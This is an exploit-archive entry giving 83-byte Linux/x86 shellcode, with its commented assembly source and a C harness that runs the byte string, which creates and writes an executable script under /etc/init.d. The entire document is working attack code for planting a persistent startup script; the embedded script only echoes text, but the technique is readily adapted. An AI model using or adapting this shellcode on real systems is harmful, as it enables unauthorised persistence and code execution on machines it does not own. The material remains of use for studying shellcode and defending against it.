|
# Exploit Title: /etc/init.d shellcode 83 bytes
# Author: nex
# Software Link: N/A
# Version: N/A
# Category: shellcode
# Tested on: Linux/x86 2.6.27-9-generic
/* copy in /etc/init.d shellcode */
/* 83 bytes lenght */
/*
.text
.globl _start
_start:
xor %eax,%eax
xor %ebx,%ebx
push $0x4168732E
push $0x4168732D
push $0x74696E69
push $0x2F642E74
push $0x696E692F
push $0x6374652F
movl %esp, %ebx
movb %al,23(%ebx)
movb $0x5,%al
movb $( 0x40 | 0x1 ), %cl
movl $0x41414141,%edx
xorl $0x414140bc,%edx
# movl $0x1fd, %edx
# open( "/etc/init.d/init-shellA.sh", O_WRONLY | O_CREAT, 0775 );
int $0x80
jmp shellcode
write:
pop %ecx
movl %eax,%ebx
xor %eax,%eax
movb $0x4,%al
xor %edx,%edx
movb $0x13, %dl
# write( initd, shellcode, size_of_shellcode )
int $0x80
# _exit( 0 );
xor %eax,%eax
xorb %bl,%bl
inc %eax
int $0x80
shellcode:
call write
.ascii "#!/bin/bash\necho we"
*/
char payload[] = "\x31\xc0\x31\xdb\x68\x2e\x73\x68"
"\x41\x68\x2d\x73\x68\x41\x68\x69"
"\x6e\x69\x74\x68\x74\x2e\x64\x2f"
"\x68\x2f\x69\x6e\x69\x68\x2f\x65"
"\x74\x63\x89\xe3\x88\x43\x17\xb0"
"\x05\xb1\x41\xba\x41\x41\x41\x41"
"\x81\xf2\xbc\x40\x41\x41\xcd\x80"
"\xeb\x14\x59\x89\xc3\x31\xc0\xb0"
"\x04\x31\xd2\xb2\x13\xcd\x80\x31"
"\xc0\x30\xdb\x40\xcd\x80\xe8\xe7"
"\xff\xff\xff"
"#!/bin/bash\necho we";
int
main()
{
((void(*)())payload)();
return 0;
}
|
| |
|
推荐
评论(0条)
